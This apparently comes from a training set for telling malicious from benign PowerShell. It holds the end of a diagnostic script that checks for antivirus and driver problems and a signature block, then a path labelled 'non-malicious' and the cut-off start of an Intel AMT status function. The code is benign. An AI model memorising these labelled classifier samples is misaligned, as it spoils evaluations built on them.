Endpoint Encryption for PCs may cause slow boot or delay between CTRL+ALT+DEL and Cred Run-DiagExpression .\TS_SBSL_MCAfee_EEPC_SlowBoot.ps1 # [Idea ID 3181] [Windows] Symantec Endpoint Protection's smc.exe causing handle leak Run-DiagExpression .\TS_SEPProcessHandleLeak.ps1 # Check for Sophos BEFLT.SYS version 5.60.1.7 Run-DiagExpression .\TS_B2693877_Sophos_BEFLTCheck.ps1 # [KSE Rule] [ Windows V3] HpCISSs2 version 62.26.0.64 causes 0xD1 or 0x9E Run-DiagExpression .\TS_HpCISSs2DriverIssueCheck.ps1 # [Idea ID 2842] [Windows] Alert Engineers if they are working on a Dell machine models R910, R810 and M910 Run-DiagExpression .\TS_DellPowerEdgeBiosCheck.ps1 # [Idea ID 3919] [Windows] Create Shadow Copy fail only on VERTIAS storage foundation volume Run-DiagExpression .\TS_VeritasVXIOBadConfigFlags.ps1 # [Idea ID 5327] [Windows] Machine imaged using vlite 1.2 will fail to install SP1 Run-DiagExpression .\TS_MachineImageVliteCheck.ps1 Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- Diag Phase:TS_obsolete W2K3/XP ---" # [Idea ID 2446] [Windows] Determining the trimming threshold set by the Memory Manager Run-DiagExpression .\TS_2K3PoolUsageMaximum.ps1 # [Idea ID 7065] [Windows] Alert users about Windows XP EOS #_# Run-DiagExpression .\TS_WindowsXPEOSCheck.ps1 } # Hotfix Rollups Run-DiagExpression .\DC_HotfixRollups.ps1 $stopTime_AutoAdd = Get-Date $duration = $(New-TimeSpan -Start $startTime_AutoAdd -End $stopTime_AutoAdd) Write-Host -BackgroundColor Gray -ForegroundColor Black -Object "*** $(Get-Date -UFormat "%R:%S") DONE (Dur: $duration) TS_AutoAddCommands_Remote.ps1 SkipTS: $Global:skipTS - SkipBPA: $Global:skipBPA" # SIG # Begin signature block # MIIoPAYJKoZIhvcNAQcCoIIoLTCCKCkCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCAnb01IPXLE01XL # RGkF+qsNCcbdzJ8qHDiDFLwu36QzMaCCDYUwggYDMIID66ADAgECAhMzAAAEA73V # lV0POxitAAAAAAQDMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjQwOTEyMjAxMTEzWhcNMjUwOTExMjAxMTEzWjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQCfdGddwIOnbRYUyg03O3iz19XXZPmuhEmW/5uyEN+8mgxl+HJGeLGBR8YButGV # LVK38RxcVcPYyFGQXcKcxgih4w4y4zJi3GvawLYHlsNExQwz+v0jgY/aejBS2EJY # oUhLVE+UzRihV8ooxoftsmKLb2xb7BoFS6UAo3Zz4afnOdqI7FGoi7g4vx/0MIdi # kwTn5N56TdIv3mwfkZCFmrsKpN0zR8HD8WYsvH3xKkG7u/xdqmhPPqMmnI2jOFw/ # /n2aL8W7i1Pasja8PnRXH/QaVH0M1nanL+LI9TsMb/enWfXOW65Gne5cqMN9Uofv # ENtdwwEmJ3bZrcI9u4LZAkujAgMBAAGjggGCMIIBfjAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQU6m4qAkpz4641iK2irF8eWsSBcBkw # VAYDVR0RBE0wS6RJMEcxLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJh # dGlvbnMgTGltaXRlZDEWMBQGA1UEBRMNMjMwMDEyKzUwMjkyNjAfBgNVHSMEGDAW # gBRIbmTlUAXTgqoXNzcitW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8v # d3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIw # MTEtMDctMDguY3JsMGEGCCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDov # L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDEx # XzIwMTEtMDctMDguY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIB # AFFo/6E4LX51IqFuoKvUsi80QytGI5ASQ9zsPpBa0z78hutiJd6w154JkcIx/f7r # EBK4NhD4DIFNfRiVdI7EacEs7OAS6QHF7Nt+eFRNOTtgHb9PExRy4EI/jnMwzQJV # NokTxu2WgHr/fBsWs6G9AcIgvHjWNN3qRSrhsgEdqHc0bRDUf8UILAdEZOMBvKLC # rmf+kJPEvPldgK7hFO/L9kmcVe67BnKejDKO73Sa56AJOhM7CkeATrJFxO9GLXos # oKvrwBvynxAg18W+pagTAkJefzneuWSmniTurPCUE2JnvW7DalvONDOtG01sIVAB # +ahO2wcUPa2Zm9AiDVBWTMz9XUoKMcvngi2oqbsDLhbK+pYrRUgRpNt0y1sxZsXO # raGRF8lM2cWvtEkV5UL+TQM1ppv5unDHkW8JS+QnfPbB8dZVRyRmMQ4aY/tx5x5+ # sX6semJ//FbiclSMxSI+zINu1jYerdUwuCi+P6p7SmQmClhDM+6Q+btE2FtpsU0W # +r6RdYFf/P+nK6j2otl9Nvr3tWLu+WXmz8MGM+18ynJ+lYbSmFWcAj7SYziAfT0s # IwlQRFkyC71tsIZUhBHtxPliGUu362lIO0Lpe0DOrg8lspnEWOkHnCT5JEnWCbzu # iVt8RX1IV07uIveNZuOBWLVCzWJjEGa+HhaEtavjy6i7MIIHejCCBWKgAwIBAgIK # YQ6Q0gAAAAAAAzANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlm # aWNhdGUgQXV0aG9yaXR5IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEw # OTA5WjB+MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYD # VQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG # 9w0BAQEFAAOCAg8AMIICCgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+la # UKq4BjgaBEm6f8MMHt03a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc # 6Whe0t+bU7IKLMOv2akrrnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4D # dato88tt8zpcoRb0RrrgOGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+ # lD3v++MrWhAfTVYoonpy4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nk # kDstrjNYxbc+/jLTswM9sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6 # A4aN91/w0FK/jJSHvMAhdCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmd # X4jiJV3TIUs+UsS1Vz8kA/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL # 5zmhD+kjSbwYuER8ReTBw3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zd # sGbiwZeBe+3W7UvnSSmnEyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3 # T8HhhUSJxAlMxdSlQy90lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS # 4NaIjAsCAwEAAaOCAe0wggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRI # bmTlUAXTgqoXNzcitW2oynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTAL # BgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBD # uRQFTuHqp8cx0SOJNDBaBgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jv # c29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3JsMF4GCCsGAQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3J0MIGfBgNVHSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEF # BQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1h # cnljcHMuaHRtMEAGCCsGAQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkA # YwB5AF8AcwB0AGEAdABlAG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn # 8oalmOBUeRou09h0ZyKbC5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7 # v0epo/Np22O/IjWll11lhJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0b # pdS1HXeUOeLpZMlEPXh6I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/ # KmtYSWMfCWluWpiW5IP0wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvy # CInWH8MyGOLwxS3OW560STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBp # mLJZiWhub6e3dMNABQamASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJi # hsMdYzaXht/a8/jyFqGaJ+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYb # BL7fQccOKO7eZS/sl/ahXJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbS # oqKfenoi+kiVH6v7RyOA9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sL # gOppO6/8MO0ETI7f33VtY5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtX # cVZOSEXAQsmbdlsKgEhr/Xmfwb1tbWrJUnMTDXpQzTGCGg0wghoJAgEBMIGVMH4x # CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt # b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01p # Y3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBIDIwMTECEzMAAAQDvdWVXQ87GK0AAAAA # BAMwDQYJYIZIAWUDBAIBBQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw # HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEICMP # ydAc95hOxTKTbaZ1aStcVonzztoxoXf4W3cmYbSUMEIGCisGAQQBgjcCAQwxNDAy # oBSAEgBNAGkAYwByAG8AcwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20wDQYJKoZIhvcNAQEBBQAEggEAO5TOIM2o1KOCzl0WzryCllCRUsu45ANbGaNj # YTW12rx/bfSJJhjSZBVAJEUbbQfRA3SD+OpnWtTLMyFfvc0V5rDXlkeR6H1v8wHf # gg/iDlB5PCzTJ7EzVQWwk8Lsuxf2P4pz+p/VOGGF6Tx3T/K9Vtj6uZfXNwMyr+wv # Q3Ts/sFnRbxaD4EIhsiLOfvf4cID04ZpeOpXnKqTAHL5mXGCkbg1BSu/KrOb0YoW # LHPo13qYRp70Gvvm/EQMQgQJCJjFzx4RrhzVUuz2m0qqIea8iWCZ1RZVK4qZvSqG # 0yE0mFRERhT+uD6MISq0xOGP0KS+3B1x2JZ/BCmmNhuZfa5HJ6GCF5cwgheTBgor # BgEEAYI3AwMBMYIXgzCCF38GCSqGSIb3DQEHAqCCF3AwghdsAgEDMQ8wDQYJYIZI # AWUDBAIBBQAwggFSBgsqhkiG9w0BCRABBKCCAUEEggE9MIIBOQIBAQYKKwYBBAGE # WQoDATAxMA0GCWCGSAFlAwQCAQUABCDwCnVSb/plvykTtklka0RAxl/cvRdB1DVE # iQzRPi8FcgIGZxp39n/1GBMyMDI0MTAyODExNDA1MC40MzlaMASAAgH0oIHRpIHO # MIHLMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQL # ExxNaWNyb3NvZnQgQW1lcmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxk # IFRTUyBFU046OTIwMC0wNUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1l # LVN0YW1wIFNlcnZpY2WgghHtMIIHIDCCBQigAwIBAgITMwAAAecujy+TC08b6QAB # AAAB5zANBgkqhkiG9w0BAQsFADB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz # aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv # cnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAx # MDAeFw0yMzEyMDYxODQ1MTlaFw0yNTAzMDUxODQ1MTlaMIHLMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1l # cmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046OTIwMC0w # NUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2Uw # ggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDCV58v4IuQ659XPM1DtaWM # v9/HRUC5kdiEF89YBP6/Rn7kjqMkZ5ESemf5Eli4CLtQVSefRpF1j7S5LLKisMWO # GRaLcaVbGTfcmI1vMRJ1tzMwCNIoCq/vy8WH8QdV1B/Ab5sK+Q9yIvzGw47TfXPE # 8RlrauwK/e+nWnwMt060akEZiJJz1Vh1LhSYKaiP9Z23EZmGETCWigkKbcuAnhvh # 3yrMa89uBfaeHQZEHGQqdskM48EBcWSWdpiSSBiAxyhHUkbknl9PPztB/SUxzRZj # UzWHg9bf1mqZ0cIiAWC0EjK7ONhlQfKSRHVLKLNPpl3/+UL4Xjc0Yvdqc88gOLUr # /84T9/xK5r82ulvRp2A8/ar9cG4W7650uKaAxRAmgL4hKgIX5/0aIAsbyqJOa6OI # GSF9a+DfXl1LpQPNKR792scF7tjD5WqwIuifS9YUiHMvRLjjKk0SSCV/mpXC0BoP # kk5asfxrrJbCsJePHSOEblpJzRmzaP6OMXwRcrb7TXFQOsTkKuqkWvvYIPvVzC68 # UM+MskLPld1eqdOOMK7Sbbf2tGSZf3+iOwWQMcWXB9gw5gK3AIYK08WkJJuyzPqf # itgubdRCmYr9CVsNOuW+wHDYGhciJDF2LkrjkFUjUcXSIJd9f2ssYitZ9CurGV74 # BQcfrxjvk1L8jvtN7mulIwIDAQABo4IBSTCCAUUwHQYDVR0OBBYEFM/+4JiAnzY4 # dpEf/Zlrh1K73o9YMB8GA1UdIwQYMBaAFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMF8G # A1UdHwRYMFYwVKBSoFCGTmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMv # Y3JsL01pY3Jvc29mdCUyMFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNybDBs # BggrBgEFBQcBAQRgMF4wXAYIKwYBBQUHMAKGUGh0dHA6Ly93d3cubWljcm9zb2Z0 # LmNvbS9wa2lvcHMvY2VydHMvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUy # MDIwMTAoMSkuY3J0MAwGA1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUH # AwgwDgYDVR0PAQH/BAQDAgeAMA0GCSqGSIb3DQEBCwUAA4ICAQB0ofDbk+llWi1c # C6nsfie5Jtp09o6b6ARCpvtDPq2KFP+hi+UNNP7LGciKuckqXCmBTFIhfBeGSxvk # 6ycokdQr3815pEOaYWTnHvQ0+8hKy86r1F4rfBu4oHB5cTy08T4ohrG/OYG/B/gN # nz0Ol6v7u/qEjz48zXZ6ZlxKGyZwKmKZWaBd2DYEwzKpdLkBxs6A6enWZR0jY+q5 # FdbV45ghGTKgSr5ECAOnLD4njJwfjIq0mRZWwDZQoXtJSaVHSu2lHQL3YHEFikun # bUTJfNfBDLL7Gv+sTmRiDZky5OAxoLG2gaTfuiFbfpmSfPcgl5COUzfMQnzpKfX6 # +FkI0QQNvuPpWsDU8sR+uni2VmDo7rmqJrom4ihgVNdLaMfNUqvBL5ZiSK1zmaEL # BJ9a+YOjE5pmSarW5sGbn7iVkF2W9JQIOH6tGWLFJS5Hs36zahkoHh8iD963LeGj # ZqkFusKaUW72yMj/yxTeGEDOoIr35kwXxr1Uu+zkur2y+FuNY0oZjppzp95AW1le # hP0xaO+oBV1XfvaCur/B5PVAp2xzrosMEUcAwpJpio+VYfIufGj7meXcGQYWA8Um # r8K6Auo+Jlj8IeFS6lSvKhqQpmdBzAMGqPOQKt1Ow3ZXxehK7vAiim3ZiALlM0K5 # 46k0sZrxdZPgpmz7O8w9gHLuyZAQezCCB3EwggVZoAMCAQICEzMAAAAVxedrngKb # SZkAAAAAABUwDQYJKoZIhvcNAQELBQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQI # EwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3Nv # ZnQgQ29ycG9yYXRpb24xMjAwBgNVBAMTKU1pY3Jvc29mdCBSb290IENlcnRpZmlj # YXRlIEF1dGhvcml0eSAyMDEwMB4XDTIxMDkzMDE4MjIyNVoXDTMwMDkzMDE4MzIy # NVowfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcT # B1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UE # AxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwggIiMA0GCSqGSIb3DQEB # AQUAA4ICDwAwggIKAoICAQDk4aZM57RyIQt5osvXJHm9DtWC0/3unAcH0qlsTnXI # yjVX9gF/bErg4r25PhdgM/9cT8dm95VTcVrifkpa/rg2Z4VGIwy1jRPPdzLAEBjo # YH1qUoNEt6aORmsHFPPFdvWGUNzBRMhxXFExN6AKOG6N7dcP2CZTfDlhAnrEqv1y # aa8dq6z2Nr41JmTamDu6GnszrYBbfowQHJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v # 3byNpOORj7I5LFGc6XBpDco2LXCOMcg1KL3jtIckw+DJj361VI/c+gVVmG1oO5pG # ve2krnopN6zL64NF50ZuyjLVwIYwXE8s4mKyzbnijYjklqwBSru+cakXW2dg3viS # kR4dPf0gz3N9QZpGdc3EXzTdEonW/aUgfX782Z5F37ZyL9t9X4C626p+Nuw2TPYr # bqgSUei/BQOj0XOmTTd0lBw0gg/wEPK3Rxjtp+iZfD9M269ewvPV2HM9Q07BMzlM # jgK8QmguEOqEUUbi0b1qGFphAXPKZ6Je1yh2AuIzGHLXpyDwwvoSCtdjbwzJNmSL # W6CmgyFdXzB0kZSU2LlQ+QuJYfM2BjUYhEfb3BvR/bLUHMVr9lxSUV0S2yW6r1AF # emzFER1y7435UsSFF5PAPBXbGjfHCBUYP3irRbb1Hode2o+eFnJpxq57t7c+auIu # rQIDAQABo4IB3TCCAdkwEgYJKwYBBAGCNxUBBAUCAwEAATAjBgkrBgEEAYI3FQIE # FgQUKqdS/mTEmr6CkTxGNSnPEP8vBO4wHQYDVR0OBBYEFJ+nFV0AXmJdg/Tl0mWn # G1M1GelyMFwGA1UdIARVMFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYIKwYBBQUHAgEW # M2h0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5 # Lmh0bTATBgNVHSUEDDAKBggrBgEFBQcDCDAZBgkrBgEEAYI3FAIEDB4KAFMAdQBi # AEMAQTALBgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBTV # 9lbLj+iiXGJo0T2UkFvXzpoYxDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3Js # Lm1pY3Jvc29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXRfMjAx # MC0wNi0yMy5jcmwwWgYIKwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8v # d3d3Lm1pY3Jvc29mdC5jb20vcGtpL2NlcnRzL01pY1Jvb0NlckF1dF8yMDEwLTA2 # LTIzLmNydDANBgkqhkiG9w0BAQsFAAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv # 6lwUtj5OR2R4sQaTlz0xM7U518JxNj/aZGx80HU5bbsPMeTCj/ts0aGUGCLu6WZn # OlNN3Zi6th542DYunKmCVgADsAW+iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1 # bSNU5HhTdSRXud2f8449xvNo32X2pFaq95W2KFUn0CS9QKC/GbYSEhFdPSfgQJY4 # rPf5KYnDvBewVIVCs/wMnosZiefwC2qBwoEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU # 6ZGyqVvfSaN0DLzskYDSPeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT99kxybxCrdTDF # NLB62FD+CljdQDzHVG2dY3RILLFORy3BFARxv2T5JL5zbcqOCb2zAVdJVGTZc9d/ # HltEAY5aGZFrDZ+kKNxnGSgkujhLmm77IVRrakURR6nxt67I6IleT53S0Ex2tVdU # CbFpAUR+fKFhbHP+CrvsQWY9af3LwUFJfn6Tvsv4O+S3Fb+0zj6lMVGEvL8CwYKi # excdFYmNcP7ntdAoGokLjzbaukz5m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTm # dHRbatGePu1+oDEzfbzL6Xu/OHBE0ZDxyKs6ijoIYn/ZcGNTTY3ugm2lBRDBcQZq # ELQdVTNYs6FwZvKhggNQMIICOAIBATCB+aGB0aSBzjCByzELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjElMCMGA1UECxMcTWljcm9zb2Z0IEFtZXJp # Y2EgT3BlcmF0aW9uczEnMCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOjkyMDAtMDVF # MC1EOTQ3MSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMK # AQEwBwYFKw4DAhoDFQCzcgTnGasSwe/dru+cPe1NF/vwQ6CBgzCBgKR+MHwxCzAJ # BgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25k # MR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jv # c29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwMA0GCSqGSIb3DQEBCwUAAgUA6smTdjAi # GA8yMDI0MTAyODA0MzcxMFoYDzIwMjQxMDI5MDQzNzEwWjB3MD0GCisGAQQBhFkK # BAExLzAtMAoCBQDqyZN2AgEAMAoCAQACAgsfAgH/MAcCAQACAhSeMAoCBQDqyuT2 # AgEAMDYGCisGAQQBhFkKBAIxKDAmMAwGCisGAQQBhFkKAwKgCjAIAgEAAgMHoSCh # CjAIAgEAAgMBhqAwDQYJKoZIhvcNAQELBQADggEBAACu8K1erSG3WA+KFwBfZzin # NGLPeJwLYnFLBSgW0x8bVs9wv8pBHL2TK6Pe23xtA/0uCwDBh6P5fC2xQb1j36fF # n4yH74aFvokpslhV4n1kKIE8LqhplPRpGriSZ+s07DcVOeLDZ8jRV5RkN3/8myyj # 76R5HSgyZastSefkWLKhdgv1pa1yD8l6NbtcI69W0Viwz4WdjgqLTwtASbKYSOWt # Sz0xycvyKPGMldl/P7yrDnTw5N916Uubpcaa2OOV/GP1RGATQZoGg3+zPuKYYn2C # EPlS/wpUPG/n2c5x80jT3Rlh8SXd7wZxaZ9KVgMTavWz6I0tYfwtNUTabE9ovWkx # ggQNMIIECQIBATCBkzB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3Rv # bjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0 # aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMAITMwAA # Aecujy+TC08b6QABAAAB5zANBglghkgBZQMEAgEFAKCCAUowGgYJKoZIhvcNAQkD # MQ0GCyqGSIb3DQEJEAEEMC8GCSqGSIb3DQEJBDEiBCC1oqCstwWBN1osxTxT1iA/ # cGjn2QMGA7GG78m4eYBaWTCB+gYLKoZIhvcNAQkQAi8xgeowgecwgeQwgb0EIOU2 # XQ12aob9DeDFXM9UFHeEX74Fv0ABvQMG7qC51nOtMIGYMIGApH4wfDELMAkGA1UE # BhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAc # BgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0 # IFRpbWUtU3RhbXAgUENBIDIwMTACEzMAAAHnLo8vkwtPG+kAAQAAAecwIgQgfk7y # L/Fg+qwMxB83yRNFNNOGBa29IheaFT2QvafHnF0wDQYJKoZIhvcNAQELBQAEggIA # P84D880DCqWtUg8ny5TJJBuCW2eisPcI6hKb175ZBvgFZusVkVnqPtfMLpDY9g29 # sl9aTwp415aJbPI5HDeAi5rJ8tuxZU8HIkuTv9kXo6SgzMy7y1dSzapjM6BtEs3P # E9dP64IdjxprKhqyikXjl/EbD8jBKG5whXsgQQF/cZiO/P86ieYGkVPNmN/ikaN8 # SJerx6+NNtQt7QQqyebR/qvKev4TwQu0GfH5JdzFvjhN2/yEVwhFAQUDR3DeqZFa # +mFurmAo8hHeGMjVF9Y9Kee1F8YW3PLQXT18Re8Oe8rvUzj9j2tX3YR6tlq23o8H # ySdNWTVvftWOfVr86oOEyYWgaQebKOHLvrCBE3HbsNSxLAyHjUleEowaaMZfOmQq # guw6Y2Ii0Dv3sM2yu+j9Rvbenw+JZN2r5cbxGCWCPIAP2HjKPsV6r9/e45x9gKVG # RbMujdRHMqPJu9FDAbgFD6s68TfOgW+tlazlSNlXJCm+xC7zzkrc2YG+zU3vDS8T # uSMArHiE1wpRuzgU0fsgin2qdDlbBkrEHHsUmJ//6D5KwufZ9HBL3THpIItPttYe # JqXFdgouxUKw0gJi9kw9vq/eJJXIMfkih4+V6zmSaYUpYYrf8My5c4G9FQL5je+x # XLlxmuW7h+Ed3ucs9OR7Oe+kBKpx7hcq0/tTYzkWRKY= # SIG # End signature block
combined_dataset/train/non-malicious/sample_40_7.ps1
sample_40_7.ps1
# Copyright (C) Intel Corporation, 2007 - 2019 All Rights Reserved. Function get-AMTMPSStatus { <# .Synopsis Returns the status of the Intel Fast Call for Help Management Presence Server (MPS) interface settings .Description Returns the status of the Intel Fast Call for Help Management Presence Server (MPS) interface settings .Notes .Link http:\\vproexpert.com http:\\www.intel.com\vpro http:\\www.intel.com .Example get-AMTMPSStatus HTTPProxy SOCKSProxy Client Enabled --------- ---------- ------ ------- HTTP Proxy address SOCKS Proxy address True #> [CmdletBinding()] Param () Process { [System.Reflection.Assembly]::LoadWithPartialName("Intel.Management.Wsman") $mps = new-object Intel.Management.Wsman.MpsManager $Results = @() foreach($Hostname in $mps.hosts) { $Obj = new-object psobject $Obj | Add-Member -MemberType noteproperty -Name HTTPProxy -value $mps.HttpProxy $Obj | Add-Member -MemberType noteproperty -Name SOCKSProxy -value $mps.SocksProxy $Obj | Add-Member -MemberType noteproperty -Name Client -value $Hostname $Obj | Add-Member -MemberType noteproperty -Name Enabled -value $mps.Enabled $Results += $Obj } if($mps.hosts.count -eq 0) { $Obj = new-object psobject $Obj | Add-Member -MemberType noteproperty -Name HTTPProxy -value $mps.HttpProxy 